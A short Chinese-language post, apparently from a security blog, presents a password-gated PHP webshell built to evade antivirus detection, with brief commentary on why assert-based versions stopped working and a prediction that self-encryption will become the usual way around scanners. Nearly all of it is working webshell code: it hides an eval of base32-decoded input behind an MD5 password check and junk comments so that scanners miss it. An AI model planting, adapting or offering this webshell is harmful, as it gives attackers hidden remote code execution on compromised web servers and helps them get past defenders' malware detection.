security - 一句话免杀 php webshell anti-virus virustotal.com
发布时间: 2023-01-20 01:58:00
这个简直太强大了
一直以来我以为无法过是因为 eval 的原因, 看了很多免杀,都是使用assert
php 7.1 以后就无法使用assert 了。
所以看起来还是没问题的。
估计以后 使用自行加密、解密的方式是绕过的主流
<?php
class PLRN{
public $DLUG = null;
public $FVRE = null;
function __construct(){
if(md5($_GET["pass"])=="df24bfd1325f82ba5fd3d3be2450096e"){
$this->DLUG = 'mv3gc3bierpvat2tkrnxuzlsn5ossoy';
$this->FVRE = @XGAV($this->DLUG);
@eval("/*M]Eq[%e*/".$this->FVRE."/*M]Eq[%e*/");
}
}
}
new PLRN();
function NXUM($NHML){
$BASE32_ALPHABET = 'abcdefghijklmnopqrstuvwxyz234567';
$DTSE = '';
$v = 0;
$vbits = 0;
for ($i = 0, $j = strlen($NHML); $i < $j; $i++){
$v <<= 8;
$v += ord($NHML[$i]);
$vbits += 8;
while ($vbits >= 5) {
$vbits -= 5;
$DTSE .= $BASE32_ALPHABET[$v >> $vbits];
$v &= ((1 << $vbits) - 1);}}
if ($vbits > 0){
$v <<= (5 - $vbits);
$DTSE .= $BASE32_ALPHABET[$v];}
return $DTSE;}
function XGAV($NHML){
$DTSE = '';
$v = 0;
$vbits = 0;
for ($i = 0, $j = strlen($NHML); $i < $j; $i++){
$v <<= 5;
if ($NHML[$i] >= 'a' && $NHML[$i] <= 'z'){
$v += (ord($NHML[$i]) - 97);
} elseif ($NHML[$i] >= '2' && $NHML[$i] <= '7') {
$v += (24 + $NHML[$i]);
} else {
exit(1);
}
$vbits += 5;
while ($vbits >= 8){
$vbits -= 8;
$DTSE .= chr($v >> $vbits);
$v &= ((1 << $vbits) - 1);}}
return $DTSE;}
?>
